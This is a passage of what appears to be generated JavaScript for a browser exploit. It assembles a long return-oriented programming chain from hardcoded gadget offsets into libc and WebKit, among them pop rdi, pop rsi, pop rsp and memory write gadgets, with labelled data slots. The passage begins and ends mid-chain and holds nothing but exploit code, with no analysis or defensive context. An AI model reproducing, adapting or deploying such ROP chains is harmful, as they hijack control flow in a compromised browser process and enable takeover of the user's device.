ropchain+130768, //L1693
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1693:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1694:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+130864, //L1695
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1695:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1697:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+130984, //L1700
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+130968, //L1698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1698:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1700:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+131096, //L1701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+131144, //L1704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+131112, //L1702
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1701:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1702:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1703:
db([12, 0]); // 0xc
set_gadget(libc_base+759608,); //pop rax
//L1704:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+131248, //L1707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+131232, //L1705
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1705:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1707:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+131424, //L1710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+131440, //L1711
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+131392, //L1708
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+131408, //L1709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1708:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1709:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1710:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1711:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+131552, //L1714
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+131520, //L1712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1712:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1713:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L1714:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+131640, //L1715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1715:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1717:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+131760, //L1720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+131744, //L1718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1718:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1720:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+131848, //L1721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+131864, //L1723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L1721:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1723:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+131920, //L1724
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1724:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1726:
db([12, 0]); // 0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+132104, //L1728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+132120, //L1729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+132088, //L1727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1727:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1728:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1729:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+132232, //L1730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+132264, //L1732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+132248, //L1731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1730:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1731:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1732:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+2115150, //setle al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+132440, //L1734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+132456, //L1735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+132424, //L1733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1733:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1734:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1735:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+132616, //L1740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+132632, //L1741
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+132568, //L1737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1737:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1738:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L1739:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L1740:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1741:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+132752, //L1742+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+132744, //L1742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L1742:
db([0, 0]); // 0x0
set_gadgets([
ropchain+132768, //L1742+24
ropchain+137032, //L1736
libc_base+764760, //pop rsi
ropchain+132808, //L1743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1743:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1745:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+132928, //L1748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+132912, //L1746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1746:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1748:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+133040, //L1749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+133088, //L1752
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+133056, //L1750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1749:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1750:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1751:
db([36, 0]); // 0x24
set_gadget(libc_base+759608,); //pop rax
//L1752:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+133192, //L1755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+133176, //L1753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1753:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1755:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+133368, //L1758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+133384, //L1759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+133336, //L1756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+133352, //L1757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1756:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1757:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1758:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1759:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+133464, //L1760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+133480, //L1761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1760:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1761:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+133576, //L1763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+133560, //L1762
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1762:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1763:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+133656, //L1764
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1764:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1766:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+133776, //L1769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+133760, //L1767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1767:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1769:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+133888, //L1770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+133936, //L1773
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+133904, //L1771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1770:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1771:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1772:
db([12, 0]); // 0xc
set_gadget(libc_base+759608,); //pop rax
//L1773:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+134040, //L1776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+134024, //L1774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1774:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1776:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+134216, //L1779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+134232, //L1780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+134184, //L1777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+134200, //L1778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1777:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1778:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1779:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1780:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+134312, //L1781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+134328, //L1782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1781:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1782:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+134440, //L1783
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+134472, //L1785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+134456, //L1784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1783:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1784:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1785:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+2115150, //setle al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+134648, //L1787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+134664, //L1788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+134632, //L1786
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1786:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1787:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1788:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+134824, //L1793
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+134840, //L1794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+134776, //L1790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1790:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1791:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L1792:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1793:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1794:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+134952, //L1795+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+134944, //L1795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L1795:
db([0, 0]); // 0x0
set_gadgets([
ropchain+134968, //L1795+24
ropchain+136656, //L1789
libc_base+764760, //pop rsi
ropchain+135008, //L1796
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1796:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1798:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+135128, //L1801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+135112, //L1799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1799:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1801:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+135304, //L1804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+135320, //L1805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+135272, //L1802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+135288, //L1803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1802:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1803:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1804:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1805:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+135400, //L1806
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+135416, //L1807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1806:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1807:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+135576, //L1811
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+135544, //L1809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+135560, //L1810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1808:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L1809:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1810:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1811:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+135632, //L1813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L1813:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+135760, //L1815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+135776, //L1816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+135744, //L1814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1814:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1815:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1816:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+135856, //L1817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+135872, //L1818
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1817:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1818:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+135968, //L1820
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+135952, //L1819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1819:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1820:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+136048, //L1821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1821:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1822:
db([10, 0]); // 0xa
set_gadget(libc_base+144605,); //pop rdi
//L1823:
db([10, 0]); // 0xa
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+136192, //L1824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+136224, //L1826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+136208, //L1825
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1824:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1825:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1826:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+136400, //L1828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+136416, //L1829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+136384, //L1827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1827:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1828:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1829:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+136560, //L1832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+136576, //L1833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+136528, //L1830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1830:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1831:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L1832:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1833:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+136648, //L1834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1834:
db([0, 0]); // 0x0
//L1789:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+136776, //L1837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+136792, //L1838
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+136760, //L1836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1836:
